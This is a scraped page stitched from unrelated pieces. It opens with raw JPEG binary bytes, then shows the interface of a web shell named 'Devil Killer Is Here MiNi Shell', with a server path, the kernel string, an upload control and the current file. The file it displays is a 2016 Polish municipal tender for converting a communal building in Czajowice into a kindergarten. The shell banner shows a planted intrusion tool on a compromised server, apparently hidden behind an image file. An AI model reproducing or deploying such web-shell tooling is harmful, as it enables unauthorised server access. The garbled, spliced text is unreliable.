JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160923/312855-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 312855 - 2016
              z dnia 2016-09-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szyce: Przebudowa rozbudowa budynku komunalnego ze zmiana sposobu użytkowania  na przedszkole samorządowe na działce nr 23,24,530,21/2 w miejscowości Czajowice, Gmina Wielka Wieś<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Wielka Wieś, krajowy numer identyfikacyjny
              55178600000, ul.
              Plac Wspólnoty 
              1,
              32085  
              Szyce, woj.
              małopolskie, państwo
              , tel.
              012 4191704 wew. 130, e-mail
              zamowienia@wielka-wies.pl, faks
              124 191 705.
              <br />
              Adres strony internetowej (URL): www.wielka-wies.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.wielka-wies.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.wielka-wie.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wielka-wie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę pisemejnależy złożyć osobiście w Urzedzie Gminy Wielka Wieś przesłać pocztą lub kurierem <br />
                Adres:
                <br />Urząd Gminy Wielka Wieś </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa rozbudowa budynku komunalnego ze zmiana sposobu użytkowania  na przedszkole samorządowe na działce nr 23,24,530,21/2 w miejscowości Czajowice, Gmina Wielka Wieś<br /><b>Numer referencyjny: </b>ZP.271.11.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest: Przebudowa rozbudowa budynku komunalnego ze zmiana sposobu użytkowania  na przedszkole samorządowe na działce nr 23,24,530,21/2 w miejscowości Czajowice, Gmina Wielka Wieś

2. Zadanie realizowane jest na podstawie dwóch pozwoleń na budowę:
1.) Przebudowa, rozbudowa budynku komunalnego ze zmianą sposobu użytkowania na przedszkole samorządowe wraz z wewnętrznymi instalacjami: gazu, wentylacji mechanicznej, wlz, oświetlenia zewnętrznego terenu, zewnętrznej instalacji pompy ciepła, infrastruktury technicznej: kanalizacji deszczowej wraz ze zbiornikiem na wody opadowe i sanitarnej oraz rozbiórka pomieszczenia gospodarczego oraz infrastruktury: gaz, woda, kanalizacja deszczowa na działce nr 23, 24, 530, 21/2 w m. Czajowice, gmina Wielka Wieś
2). Budowa placu zabaw oraz instalacji fotowoltaicznej na dz. Nr 24 w m. Czajowice, Gmina Wielka Wieś
3. Budynek będący przedmiotem zamówienia jest budynkiem istniejący, podlegającym przebudowie i rozbudowie przy jednoczesnym założeniu zmiany sposobu użytkowania. Pierwotnie budynek ten stanowił element zabudowy dworskiej. Pełnił też funkcję  szkoły podstawowej a w ostatnim czasie niepublicznego przedszkola. Budynek ten jest budynkiem parterowym z częściowym podpiwniczeniem. Przestrzeń dachowa nie jest wykorzystywana. Budynek figuruje w gminnej ewidencji  zabytków.   Po przebudowie i rozbudowie budynek ten będzie pełnił funkcję trzyoddziałowego przedszkola  publicznego. 
Po zrealizowaniu inwestycji budynek będzie posiadał parametry:
-pow. zabudowy - 316,85 m2
- kubatura   - 2270,00 m3
- pow. całkowita budynku    -   806 m2
- pow. użytkowa    -    543,58 m2
- pow. wewnętrzna budynku   -    625,3 m2 
- długość budynku    -      27,91 m
- max szerokość budynku27,91 m   -   19,00 m
- wysokość budynku   -   11,30 m / 9,00 m
Budynek wyposażony jest w instalacje:
- wodno-kanalizacyjna
- centralnego ogrzewania wraz z pompą ciepła
- wentylacji mechanicznej i klimatyzacji
- gazowa
- wewnętrzna elektryczna
- fotowoltaiczna
- oświetlenia zewnętrznego
4. Zakres rzeczowy zamówienia określa wykonanie zadania z podziałem na 2 elementy:
Element I Przebudowa, rozbudowa budynku komunalnego wraz ze zmianą sposobu użytkowania na przedszkole samorządowe w miejscowości Czajowice  obejmuje niżej wymienione roboty:
1 Cz. dobudowana
- roboty ziemne
- fundamenty
- podłoża
- elementy żelbetowe
- ściany murowane
- więźba dachowa
- pokrycie dachu
- stolarka okienna i drzwiowa
- posadzki parter
- posadzki piętro
- tynki i wykładziny ścian, malowanie
- tynki i wykładziny ścian, strop poddasza
- elewacja zewnętrzna
- podnośnik dla niepełnosprawnych i winda towarowa.
2 Budynek istniejący 
- roboty rozbiórkowe  dobudówka
- roboty rozbiórkowe, bud. istniejący
- elementy żelbetowe
- roboty murowe, zamurowania, uzupełnienia
- więźba dachowa
- pokrycie dachu
- posadzki piwnica
- posadzki parter
- posadzki piętro
- tynki , malowanie piwnica
- tynki, wykładziny ścian  parter
- tynki, wykładziny ścian, strop poddasza
- stolarka okienna i drzwiowa
- elewacje, r. zewnętrzne
- zasilanie el. Budynku
- zasilanie pompy odwadniającej
- skrzynka przyłączeniowa agregatu
- instalacje elektryczne wewnętrzne  prefabrykaty
- system wykrywania stężenia gazu
- trasy kablowe
- oprzewodowanie
- oprawy oświetleniowe
- osprzęt elektroinstalacyjny
- instalacja przyzewowa
- instalacja odgromowa
- pomiary
- instalacje słaboprądowe, INTERKOMU
- sieć strukturalna
- instalacja RTV-SAT
- system oddymiania
- instalacja SSWiN
- instalacja CCTV
- instalacja wody użytkowej
- instalacja kanalizacji sanitarnej
- pompy ciepła
- obieg grzewczy ogrzewania podł. I grzejnikowego (parter + piwnica)
- obieg grzewczy ogrzewania podł. I grzejnikowego (piętro i poddasze)
- obieg grzewczy (PC-rozdzielacze)
- obieg centrali nawiewno-wywiewnej  CNW-1
- obieg centrali nawiewno-wywiewnej CNW-2
- obieg CNW (PC-Bufor-rozdzielacze)
- instalacja gazowa
- instalacje zewnętrzne  przyłącz wodociągowy
- kanalizacja sanitarna  rurociągi i ich uzbrojenie
- kanalizacja opadowa  rurociągi i ich uzbrojenie
- instalacja od GWC  P do pompy ciepła
- nawierzchnie utwardzone
- taras zewnętrzny z desek kompozytowych
- remont ogrodzenia
- zieleń
- wiata śmietnikowa
- plac zabaw.
Element II Kompleksowa termomodernizacja budynku komunalnego w m. Czajowice obejmuje niżej wymienione roboty:
- elewacja, roboty zewnętrzne
- izolacja piwnic
- instalacja wentylacji mechanicznej  parter
- instalacja wentylacji mechanicznej  1 piętro i poddasze
- instalacje elektryczne  system fotowoltaiczny

5.Wytyczne do sposobu przygotowania kosztorysu ofertowego.
1. Kosztorysy ofertowe należy sporządzić jako odrębne z podziałem na Element I i na Element II,. 
2.  Harmonogram realizacji zadania winien być opracowany na jednym arkuszu z wydzieleniem (zgrupowaniem ) robót wynikających z podziału na Element I i Element II
3. Protokół odbioru robót a w konsekwencji faktury winny być wystawiane odrębnie dla Elementu I i Elementu II 
UWAGA  !
Określenie przedmiotu zamówienia jak w załączonych przedmiarach robót i specyfikacji nie zwalnia wykonawcy od dokładnego zapoznania się z dokumentacją techniczną, celem opracowania własnego przedmiaru robót, bowiem przedmiar ten ma stanowić podstawę  do sporządzenia kosztorysu ofertowego.
 Wykonawca zdając sobie sprawę z prac jakie należy wykonać, ich znaczenia oraz ich rodzaju       obowiązany jest przez wiedzę zawodową w swojej specjalności uzupełnić szczegóły, które   mogły być pominięte w dokumentacji załączonym przedmiarze oraz specyfikacji i uwzględnić   je w kosztach.
6. Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. W każdym przypadku należy uzyskać akceptację autora projektu i inspektora nadzoru na piśmie. 

7. Przed zamówieniem materiałów, należy przedłożyć Zamawiającemu karty materiałowe na wbudowane materiały do akceptacji.  

8.  Szczegółowy zakres robót określa dokumentacja projektowa, specyfikacja techniczna oraz
przedmiary  robót wszystkich branż. 

PRZEDMIARY ROBÓT NALEŻY TRAKTOWAĆ JAKO MATERIAŁ POMOCNICZY DO
OKREŚLENIA PRZEDMIOTU ZAMÓWIENIA.PRZEDMIARY TE NIE MOGĄ STANOWIĆ
PODSTAWY DO WYCENY .

9.W CENIE RYCZAŁTOWEJ NALEŻY UWZGLEDNIĆ WSZELKIE KOSZTY NIEZBĘDNE DO
ZREALIZOWANIA ZAMÓWIENIA WYNIKAJĄCE WPROST Z DOKUMENTACJI PROJEKTOWEJ,
JAK RÓWNIEŻ W NIEJ NIE UJĘTE A BEZ KTÓRYCH NIE MOŻNA WYKONAĆ ZAMOWIENIA
( W TYM MIĘDZY INNYMI BADANIA I NADZÓR ARCHEOLOGICZNY).

10. ZAŁĄCZENIE KOSZTORYSU OFERTOWEGO DO OFERTY NIE JEST WYMAGANE.
PO WYBORZE NAJKORZYSTNIEJSZEJ OFERTY WYKONAWCA Z KTÓRYM ZOSTANIE
PODPISANA UMOWA SPORZĄDZI KOSZTORYS OFERTOWY I DOŁĄCZY
ZAMAWIAJACEMU PRZED PODPISANIEM UMOWY.

11. Dane z kosztorysu będą np. podstawą do obliczenia wynagrodzenia Wykonawcy należnego
mu z tytułu wykonania części przedmiotu zamówienia w sytuacji ewentualnego odstąpienia od
umowy, jak również wynagrodzenia za ewentualne zabezpieczenie przerwanych robót, czy też
wyliczeniu wartości robót zaniechanych. 

12. 	Podstawą do określenia kwoty ofertowej są w równej mierze opis techniczny dokumentacji, rysunki dokumentacji wszystkich branż, specyfikacje techniczne, SIWZ, wiedza zawodowa wykonawcy oraz obowiązujące normy i przepisy.

13. Zamawiający dopuszcza zastosowanie innych materiałów i urządzeń niż podane
w dokumentacji projektowej pod warunkiem, że użyte przez wykonawcę materiały będą
odpowiadać normom jakościowym wymaganym przez odpowiednie w tym względzie
przepisy oraz zapewniać standard narzucony w dokumentacji. W takiej sytuacji
Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających te materiały
i urządzenia. Operowanie przykładowymi nazwami producenta, ma jedynie na celu
doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego
rozwiązania. Posługiwanie się nazwami producentów, /produktów/ ma wyłącznie
charakter przykładowy. 

14. Inne wytyczne do obliczenia ceny oferty:
-	Realizacja robót odbywać się będzie wyłącznie z materiałów dostarczanych przez Wykonawcę.
-	Integralną częścią  Specyfikacji Istotnych Warunków Zamówienia  jest część opisowa do projektu wykonawczego składająca się z opisu technicznego, warunków technicznych wykonania i odbioru robot budowlanych.
-	Prace budowlane należy prowadzić zgodnie z:
warunkami technicznymi wykonania i odbioru robót budowlano-montażowych.

15.  Stosownie do treści art. 29 ust. 3a ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę  lub Podwykonawcę  na podstawie umowy o pracę, osób wykonujących następujące czynności w zakresie realizacji zamówienia :
- czynności dot. wykonania zbrojenia
- czynności dot. robót ciesielskich
- czynności dot. robót murarskich 
- czynności dot. robót tynkarskich

15.1. Wykonawca/Podwykonawca  zobowiązuje się, że pracownicy wykonujący czynności jak wyżej, będą zatrudnieni na umowę o pracę  w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 roku. Kodeks Pracy ( Dz. U. z 2014r. , poz. 1502 z poź. zm. )

15.2. Każdorazowo na żądanie Zamawiającego , w terminie wskazanym przez Zamawiającego, nie krótszym niż 10 dni roboczych, Wykonawca/Podwykonawca zobowiązuje się przedłożyć  do wglądu kopię umów o pracę zawartych przez Wykonawcę/ Podwykonawcę z pracownikami wykonującymi czynności o których mowa powyżej.

15.3. W tym celu Wykonawca/Podwykonawca  zobowiązany jest do uzyskania od pracowników zgody na przetwarzanie danych osobowych zgodnie z przepisami o ochronie danych osobowych.

15.4. Nieprzedłożenie przez Wykonawcę/Podwykonawcę  kopii umów zawartych przez Wykonawcę/Podwykonawcę  z pracownikami wykonującymi czynności o których mowa powyżej w terminie wskazanym przez Zamawiającego  zgodnie  z punktem 15.2. będzie traktowane jako niewypełnienie obowiązku zatrudnienia pracowników  na podstawie umowy o pracę  oraz będzie skutkować naliczaniem kar umownych w wysokości określonej w załączonym do SIWZ wzorze umowy a także  zawiadomieniem Państwowej Inspekcji Pracy o podejrzeniu zastąpienia  umowy o pracę z osobami wykonującymi pracę na warunkach określonych w art. 22 § 1 ustawy Kodeks Pracy umową cywilnoprawną.

15. 5. Zamawiający zastrzega sobie możliwość kontroli zatrudnienia w/w osób przez cały okres realizacji wykonywanych przez niego czynności  w szczególności  poprzez wezwanie do okazania dokumentów potwierdzających bieżące opłacanie składek i należnych podatków z tytułu zatrudnienia w/w osób. Kontrola może być przeprowadzona bez wcześniejszego uprzedzenia Wykonawcy /Podwykonawcy .
<br /><br /><b>II.5) Główny kod CPV: </b>45214100-1<br /><b> Dodatkowe kody CPV:</b>45330000-9,
                45332000-3,
                45317300-5,
                45316200-7,
                45311100-1,
                45311200-2,
                45312100-8,
                45312320-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 400.000,00 zł- (słownie: czterysta tysięcy złotych)<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1.1	zdolności technicznej  lub zawodowej  
1.1.1 Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę rozbudowę, przebudowę  obiektów w których wykonano roboty o kubaturze min. 2000 m każda.
1.1.2 dysponowania  personelem: 
Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: 
1 kierownikiem budowy posiadającym uprawnienia robotami w specjalności konstrukcyjno-budowlanej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Zaświadczenie właściwego naczelnika Urzędu Skarbowego  potwierdzającego, że
Wykonawca nie zalega  z opłaceniem  podatków, wystawianego nie wcześniej niż 3 miesiące
przed upływem terminu  składania ofert   lub innego dokumentu potwierdzającego, że
Wykonawca  zawarł porozumienie  z właściwym organem podatkowym  w sprawie spłat  tych
należności  wraz z ewentualnymi  odsetkami lub grzywnami w szczególności uzyskał
przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu.

2. Zaświadczenie  właściwej terenowej jednostki organizacyjnej  Zakładu Ubezpieczeń Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego  albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne , wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym  organem w sprawie spłat tych należności  wraz z ewentualnymi  odsetkami lub grzywnami w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu.  

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt. 1 i 2  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
